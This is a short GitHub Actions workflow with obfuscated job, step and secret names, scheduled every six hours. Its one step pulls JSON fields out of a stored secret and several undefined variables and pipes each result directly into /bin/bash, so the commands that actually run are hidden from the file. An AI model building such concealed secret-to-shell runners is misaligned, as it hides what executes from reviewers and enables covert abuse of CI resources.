name: heqizheng6789
on:
  workflow_dispatch:
  schedule:
    - cron: '19 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: heqizheng6789
        env:
          dq8068: ${{ secrets.dq8068 }}
        run: |
          echo $dq8068 | jq -r .qx2557 | /bin/bash
          echo $pszcw49 | jq -r .lx98 | /bin/bash
          echo $zq9 | jq -r .mv6 | /bin/bash
          echo $pf70771 | jq -r .pwah4447 | /bin/bash

